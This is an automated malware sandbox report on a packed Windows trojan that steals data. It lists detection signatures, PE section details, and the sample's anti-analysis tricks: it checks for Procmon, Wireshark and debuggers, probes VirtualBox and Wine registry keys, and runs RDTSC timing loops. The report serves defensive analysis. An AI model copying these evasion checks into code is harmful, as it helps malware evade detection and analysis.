Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: String function: 0085CAA0 appears 64 times
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: String function: 0086CCD0 appears 54 times
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: String function: 00894FD0 appears 288 times
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: String function: 00A07220 appears 97 times
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: String function: 0085C960 appears 37 times
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: String function: 008573F0 appears 114 times
Source: oJkvQZYkrx.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: oJkvQZYkrx.exeStatic PE information: Section: biyvevdc ZLIB complexity 0.9944533911839863
Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@6/2
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_2_0085255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0085255D
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_2_008529FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_008529FF
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: oJkvQZYkrx.exeReversingLabs: Detection: 68%
Source: oJkvQZYkrx.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: oJkvQZYkrx.exeString found in binary or memory: Unable to complete request for channel-process-startup
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeSection loaded: kernel.appcore.dllJump to behavior
Source: oJkvQZYkrx.exeStatic file information: File size 4455936 > 1048576
Source: oJkvQZYkrx.exeStatic PE information: Raw size of is bigger than: 0x100000 < 0x283e00
Source: oJkvQZYkrx.exeStatic PE information: Raw size of biyvevdc is bigger than: 0x100000 < 0x1b8400

Data Obfuscation

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeUnpacked PE file: 0.2.oJkvQZYkrx.exe.850000.0.unpack :EW;.rsrc:W;.idata :W; :EW;biyvevdc:EW;aogmlwgx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;biyvevdc:EW;aogmlwgx:EW;.taggant:EW;
Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
Source: oJkvQZYkrx.exeStatic PE information: real checksum: 0x4481f0 should be: 0x44f698
Source: oJkvQZYkrx.exeStatic PE information: section name:
Source: oJkvQZYkrx.exeStatic PE information: section name: .idata
Source: oJkvQZYkrx.exeStatic PE information: section name:
Source: oJkvQZYkrx.exeStatic PE information: section name: biyvevdc
Source: oJkvQZYkrx.exeStatic PE information: section name: aogmlwgx
Source: oJkvQZYkrx.exeStatic PE information: section name: .taggant
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_3_01B9EC1A push eax; ret 0_3_01B9EC29
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_3_01B9EC1A push eax; ret 0_3_01B9EC29
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_3_01BAA1B8 push esi; ret 0_3_01BAA1B9
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_3_01BAA1B8 push esi; ret 0_3_01BAA1B9
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_3_01BAA1B8 push esi; ret 0_3_01BAA1B9
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_3_01BAA198 push edx; ret 0_3_01BAA199
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_3_01BAA198 push edx; ret 0_3_01BAA199
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_3_01BAA198 push edx; ret 0_3_01BAA199
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_3_01BAA41A push 9001B62Eh; retf 0_3_01BAA425
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_3_01BAA41A push 9001B62Eh; retf 0_3_01BAA425
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_3_01BAA41A push 9001B62Eh; retf 0_3_01BAA425
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_3_01B9EC1A push eax; ret 0_3_01B9EC29
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_3_01B9EC1A push eax; ret 0_3_01B9EC29
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_3_01BAA540 push 9001B62Eh; retf 0_3_01BAA545
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_3_01BAA540 push 9001B62Eh; retf 0_3_01BAA545
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_3_01BAA540 push 9001B62Eh; retf 0_3_01BAA545
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_3_01BAA1B8 push esi; ret 0_3_01BAA1B9
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_3_01BAA1B8 push esi; ret 0_3_01BAA1B9
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_3_01BAA1B8 push esi; ret 0_3_01BAA1B9
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_3_01BAE1B2 push ebx; retf 0_3_01BAE191
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_3_01BAE1B2 push ebx; retf 0_3_01BAE191
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_3_01BAE4AF push edi; retf 0_3_01BAE4B1
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_3_01BAE4AF push edi; retf 0_3_01BAE4B1
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_3_01BAA198 push edx; ret 0_3_01BAA199
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_3_01BAA198 push edx; ret 0_3_01BAA199
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_3_01BAA198 push edx; ret 0_3_01BAA199
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_3_01BAE192 push ebx; retf 0_3_01BAE191
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_3_01BAE192 push edi; retf 0_3_01BAE1B1
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_3_01BAE192 push ebx; retf 0_3_01BAE191
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_3_01BAE192 push edi; retf 0_3_01BAE1B1
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_3_01BAE1D2 push edi; retf 0_3_01BAE1B1
Source: oJkvQZYkrx.exeStatic PE information: section name: biyvevdc entropy: 7.956080074817993

Boot Survival

barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeWindow searched: window name: RegmonClassJump to behavior
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeWindow searched: window name: RegmonclassJump to behavior
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeWindow searched: window name: FilemonclassJump to behavior
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior

Malware Analysis System Evasion

barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: oJkvQZYkrx.exe, 00000000.00000002.1628140762.0000000000D00000.00000040.00000001.01000000.00000003.sdmp, oJkvQZYkrx.exe, 00000000.00000003.1493474678.000000000769F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE
Source: oJkvQZYkrx.exe, 00000000.00000002.1628140762.0000000000D00000.00000040.00000001.01000000.00000003.sdmp, oJkvQZYkrx.exe, 00000000.00000003.1493474678.000000000769F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: X64DBG.EXE
Source: oJkvQZYkrx.exe, 00000000.00000002.1628140762.0000000000D00000.00000040.00000001.01000000.00000003.sdmp, oJkvQZYkrx.exe, 00000000.00000003.1493474678.000000000769F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: WINDBG.EXE
Source: oJkvQZYkrx.exe, 00000000.00000003.1493474678.000000000769F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: oJkvQZYkrx.exe, 00000000.00000002.1628140762.0000000000D00000.00000040.00000001.01000000.00000003.sdmp, oJkvQZYkrx.exe, 00000000.00000003.1493474678.000000000769F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: E6E315 second address: E6DBCB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D94F51081h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F6D94F51086h 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 jmp 00007F6D94F5107Dh 0x00000017 push dword ptr [ebp+122D1661h] 0x0000001d js 00007F6D94F5107Ch 0x00000023 add dword ptr [ebp+122D1892h], edx 0x00000029 call dword ptr [ebp+122D261Eh] 0x0000002f pushad 0x00000030 mov dword ptr [ebp+122D1BB1h], eax 0x00000036 jl 00007F6D94F5107Ch 0x0000003c xor eax, eax 0x0000003e mov dword ptr [ebp+122D1BB1h], ebx 0x00000044 mov edx, dword ptr [esp+28h] 0x00000048 pushad 0x00000049 mov ecx, 493E9FFDh 0x0000004e xor dword ptr [ebp+122D1BB1h], edx 0x00000054 popad 0x00000055 mov dword ptr [ebp+122D385Eh], eax 0x0000005b or dword ptr [ebp+122D1BB1h], edi 0x00000061 mov esi, 0000003Ch 0x00000066 jmp 00007F6D94F51085h 0x0000006b add esi, dword ptr [esp+24h] 0x0000006f mov dword ptr [ebp+122D1BB1h], edx 0x00000075 lodsw 0x00000077 jmp 00007F6D94F5107Ch 0x0000007c add eax, dword ptr [esp+24h] 0x00000080 mov dword ptr [ebp+122D29B7h], edx 0x00000086 jmp 00007F6D94F51080h 0x0000008b mov ebx, dword ptr [esp+24h] 0x0000008f jmp 00007F6D94F51089h 0x00000094 nop 0x00000095 jmp 00007F6D94F51083h 0x0000009a push eax 0x0000009b push eax 0x0000009c push edx 0x0000009d jnc 00007F6D94F5107Ch 0x000000a3 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: E6DBCB second address: E6DBD0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: FE1602 second address: FE1616 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 pop eax 0x00000005 jnc 00007F6D94F51076h 0x0000000b pop ecx 0x0000000c jp 00007F6D94F5107Eh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: FE06F3 second address: FE06F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: FE06F9 second address: FE0738 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6D94F5107Fh 0x00000009 js 00007F6D94F51076h 0x0000000f popad 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 pop ecx 0x00000019 pushad 0x0000001a jo 00007F6D94F51086h 0x00000020 jmp 00007F6D94F51080h 0x00000025 push ebx 0x00000026 pushad 0x00000027 popad 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: FE08AD second address: FE08E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D94B296FDh 0x00000007 pushad 0x00000008 jmp 00007F6D94B29706h 0x0000000d push edx 0x0000000e pop edx 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push esi 0x00000013 jns 00007F6D94B296F8h 0x00000019 push eax 0x0000001a push edx 0x0000001b ja 00007F6D94B296F6h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: FE0A5D second address: FE0A63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: FE0A63 second address: FE0A70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007F6D94B296F6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: FE0A70 second address: FE0A7E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D94F5107Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: FE0A7E second address: FE0A83 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: FE0A83 second address: FE0AB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jmp 00007F6D94F51083h 0x0000000d jmp 00007F6D94F51081h 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: FE0BF7 second address: FE0C1F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a pop eax 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6D94B29704h 0x00000013 jng 00007F6D94B296F6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: FE0EFA second address: FE0F06 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: FE0F06 second address: FE0F14 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: FE38D2 second address: FE38EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a jg 00007F6D94F5107Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: FE38EC second address: FE38F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: FE38F0 second address: FE394B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D94F51086h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e jmp 00007F6D94F5107Bh 0x00000013 pop eax 0x00000014 mov dword ptr [ebp+122D1B53h], ecx 0x0000001a push 00000003h 0x0000001c mov ecx, dword ptr [ebp+122D398Ah] 0x00000022 jmp 00007F6D94F5107Bh 0x00000027 push 00000000h 0x00000029 movsx edx, cx 0x0000002c push 00000003h 0x0000002e mov dword ptr [ebp+122D1BCDh], edx 0x00000034 push 8DAC25C0h 0x00000039 push esi 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: FE394B second address: FE3990 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 add dword ptr [esp], 3253DA40h 0x0000000e mov si, ax 0x00000011 lea ebx, dword ptr [ebp+124496BEh] 0x00000017 push 00000000h 0x00000019 push eax 0x0000001a call 00007F6D94B296F8h 0x0000001f pop eax 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 add dword ptr [esp+04h], 00000015h 0x0000002c inc eax 0x0000002d push eax 0x0000002e ret 0x0000002f pop eax 0x00000030 ret 0x00000031 mov ecx, dword ptr [ebp+122D3956h] 0x00000037 push eax 0x00000038 push eax 0x00000039 push edx 0x0000003a jo 00007F6D94B296F8h 0x00000040 pushad 0x00000041 popad 0x00000042 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: FE3A20 second address: FE3A53 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F6D94F5107Fh 0x0000000e nop 0x0000000f mov esi, dword ptr [ebp+122D1AD9h] 0x00000015 push 00000000h 0x00000017 movzx edx, bx 0x0000001a call 00007F6D94F51079h 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: FE3A53 second address: FE3A57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: FE3A57 second address: FE3A5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: FE3A5D second address: FE3A81 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F6D94B296FCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jng 00007F6D94B29709h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F6D94B296FBh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: FE3A81 second address: FE3A9A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a ja 00007F6D94F51084h 0x00000010 pushad 0x00000011 jbe 00007F6D94F51076h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: FE3A9A second address: FE3AD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [eax] 0x00000007 jnl 00007F6D94B29712h 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jnp 00007F6D94B296FCh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: FE3AD5 second address: FE3B95 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jne 00007F6D94F51076h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d pushad 0x0000000e jmp 00007F6D94F51085h 0x00000013 jc 00007F6D94F51077h 0x00000019 popad 0x0000001a push 00000003h 0x0000001c push 00000000h 0x0000001e push edx 0x0000001f call 00007F6D94F51078h 0x00000024 pop edx 0x00000025 mov dword ptr [esp+04h], edx 0x00000029 add dword ptr [esp+04h], 00000019h 0x00000031 inc edx 0x00000032 push edx 0x00000033 ret 0x00000034 pop edx 0x00000035 ret 0x00000036 mov di, 3DA0h 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push ecx 0x0000003f call 00007F6D94F51078h 0x00000044 pop ecx 0x00000045 mov dword ptr [esp+04h], ecx 0x00000049 add dword ptr [esp+04h], 0000001Bh 0x00000051 inc ecx 0x00000052 push ecx 0x00000053 ret 0x00000054 pop ecx 0x00000055 ret 0x00000056 jns 00007F6D94F5107Fh 0x0000005c push 00000003h 0x0000005e call 00007F6D94F51089h 0x00000063 pop esi 0x00000064 push B39E5655h 0x00000069 push eax 0x0000006a push edx 0x0000006b pushad 0x0000006c jmp 00007F6D94F5107Fh 0x00000071 jne 00007F6D94F51076h 0x00000077 popad 0x00000078 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: FE3CF3 second address: FE3D96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop ebx 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push edi 0x0000000b jmp 00007F6D94B296FFh 0x00000010 pop edi 0x00000011 pop eax 0x00000012 push 00000003h 0x00000014 movsx edi, dx 0x00000017 push 00000000h 0x00000019 sbb dl, FFFFFFF0h 0x0000001c push 00000003h 0x0000001e push 00000000h 0x00000020 push ebx 0x00000021 call 00007F6D94B296F8h 0x00000026 pop ebx 0x00000027 mov dword ptr [esp+04h], ebx 0x0000002b add dword ptr [esp+04h], 0000001Dh 0x00000033 inc ebx 0x00000034 push ebx 0x00000035 ret 0x00000036 pop ebx 0x00000037 ret 0x00000038 push B3476BA4h 0x0000003d push edi 0x0000003e jmp 00007F6D94B29707h 0x00000043 pop edi 0x00000044 add dword ptr [esp], 0CB8945Ch 0x0000004b call 00007F6D94B29704h 0x00000050 sub dword ptr [ebp+122D2AC2h], ecx 0x00000056 pop ecx 0x00000057 lea ebx, dword ptr [ebp+124496D2h] 0x0000005d mov edi, 7EC5CB85h 0x00000062 xchg eax, ebx 0x00000063 push eax 0x00000064 push edx 0x00000065 jo 00007F6D94B296F8h 0x0000006b pushad 0x0000006c popad 0x0000006d rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: FE3D96 second address: FE3DBA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D94F51082h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F6D94F5107Ah 0x00000012 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1003AD9 second address: 1003ADD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1003EE5 second address: 1003F6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jno 00007F6D94F51076h 0x0000000f jmp 00007F6D94F51088h 0x00000014 popad 0x00000015 pop ecx 0x00000016 pushad 0x00000017 jc 00007F6D94F5108Dh 0x0000001d jmp 00007F6D94F51085h 0x00000022 pushad 0x00000023 popad 0x00000024 jmp 00007F6D94F5107Dh 0x00000029 push eax 0x0000002a jc 00007F6D94F51076h 0x00000030 jp 00007F6D94F51076h 0x00000036 pop eax 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007F6D94F51087h 0x0000003e jmp 00007F6D94F5107Bh 0x00000043 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10040BB second address: 10040C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
